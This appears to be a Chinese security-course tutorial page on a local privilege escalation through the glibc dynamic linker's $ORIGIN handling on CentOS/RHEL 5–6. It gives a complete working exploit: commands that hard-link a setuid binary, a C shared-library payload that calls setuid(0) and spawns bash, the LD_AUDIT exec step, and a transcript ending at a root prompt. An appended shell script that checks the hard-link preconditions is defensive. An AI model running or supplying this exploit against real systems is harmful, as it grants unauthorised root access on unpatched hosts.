[Original] Web Security Chapter 6, Privilege Escalation Part 03: GNU C Library dynamic linker $ORIGIN overflow privilege escalation
Using /tmp directory permissions, suid permissions and C to escalate an ordinary account to ROOT privileges.
Applicable to RHEL 5 through RHEL 6 and CentOS 5 through CentOS 6; all of them can be escalated.
Escalation method
```console
[moonsec@localhost tmp]$ mkdir /tmp/exploit
[moonsec@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhost tmp]$ exec 3< /tmp/exploit/target
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhost tmp]$ rm -rf /tmp/exploit/
[moonsec@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target (deleted)
[moonsec@localhost tmp]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[moonsec@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhost tmp]# whoami
```
Create the directory:
```
mkdir /tmp/exploit
```
Create a hard link to the target file:
```
ln /bin/ping /tmp/exploit/target
```
Load the target file into memory:
```
exec 3< /tmp/exploit/target
```
Check the target's state in memory:
```
ls -l /proc/$$/fd/3
```
Delete the directory:
```
rm -rf /tmp/exploit/
```
Enter the C code:
```
cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
```
Compile the file:
```
gcc -w -fPIC -shared -o /tmp/exploit payload.c
```
Escalate to root privileges:
```
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
```
CentOS 5.5: user moonsec escalated to root privileges.
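The procedure above only gets off the ground because an unprivileged user can hard-link a setuid binary into a directory they control, which requires that the binary and the directory sit on the same filesystem and that the kernel's `fs.protected_hardlinks` sysctl is off. The following is an added hardening check written for this page; it is not the post author's code. It assumes the real Linux sysctl file `/proc/sys/fs/protected_hardlinks` (kernel 3.6 and later) and `/proc/mounts`; the `SAMPLE_MOUNTS_*` tables are constructed for illustration.

```sh
#!/bin/sh
# Added hardening check, not part of the original post. It tests the two
# preconditions of the hard-link step: the setuid binary and the writable
# directory sharing one filesystem, and fs.protected_hardlinks being off.
# /proc/sys/fs/protected_hardlinks is a real Linux (3.6+) sysctl; the
# SAMPLE_MOUNTS_* tables below are constructed for illustration.

# protected_hardlinks_enabled VALUE -> true when the sysctl value is 1, meaning
# unprivileged users cannot hard-link files they do not own.
protected_hardlinks_enabled() {
  [ "$1" = "1" ]
}

# mount_point_of PATH MOUNTS -> prints the mount point holding PATH, i.e. the
# longest mount point in MOUNTS (/proc/mounts text) that is a prefix of PATH.
mount_point_of() {
  _path=$1
  _best=/
  _best_len=1
  while read -r _dev _mnt _rest; do
    case "$_path" in
      "$_mnt"|"$_mnt"/*)
        if [ "${#_mnt}" -gt "$_best_len" ]; then
          _best=$_mnt
          _best_len=${#_mnt}
        fi ;;
    esac
  done <<EOF
$2
EOF
  printf '%s\n' "$_best"
}

# same_filesystem PATH_A PATH_B MOUNTS -> true when both paths sit on one
# mount, which is what a hard link between them requires.
same_filesystem() {
  [ "$(mount_point_of "$1" "$3")" = "$(mount_point_of "$2" "$3")" ]
}

# hardlink_exposure SYSCTL_VALUE SETUID_PATH WRITABLE_DIR MOUNTS -> true when
# an unprivileged user could still hard-link SETUID_PATH into WRITABLE_DIR.
hardlink_exposure() {
  if protected_hardlinks_enabled "$1"; then
    return 1
  fi
  same_filesystem "$2" "$3" "$4"
}

# Constructed sample mount tables (not captured from a real host).
SAMPLE_MOUNTS_SHARED='/dev/sda1 / ext4 rw 0 0
proc /proc proc rw 0 0'
SAMPLE_MOUNTS_SPLIT='/dev/sda1 / ext4 rw 0 0
/dev/sda2 /tmp ext4 rw,nosuid,nodev 0 0'

# Live check of this host, only when the proc files are readable.
if [ -r /proc/sys/fs/protected_hardlinks ] && [ -r /proc/mounts ]; then
  if hardlink_exposure "$(cat /proc/sys/fs/protected_hardlinks)" /bin/ping /tmp "$(cat /proc/mounts)"; then
    echo "WARN: /tmp shares a filesystem with /bin and protected_hardlinks is off"
  else
    echo "OK: unprivileged users cannot hard-link /bin/ping into /tmp"
  fi
fi
```

Setting `fs.protected_hardlinks=1` or placing /tmp on its own mount removes the hard-link precondition on hosts where this matters, but the actual fix for the loader behaviour is the distribution's glibc update; this script only reports whether the precondition the post relies on is still present.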
Original article, author: mOon. If you repost it, please credit the source: https://www.moonsec.com/398.html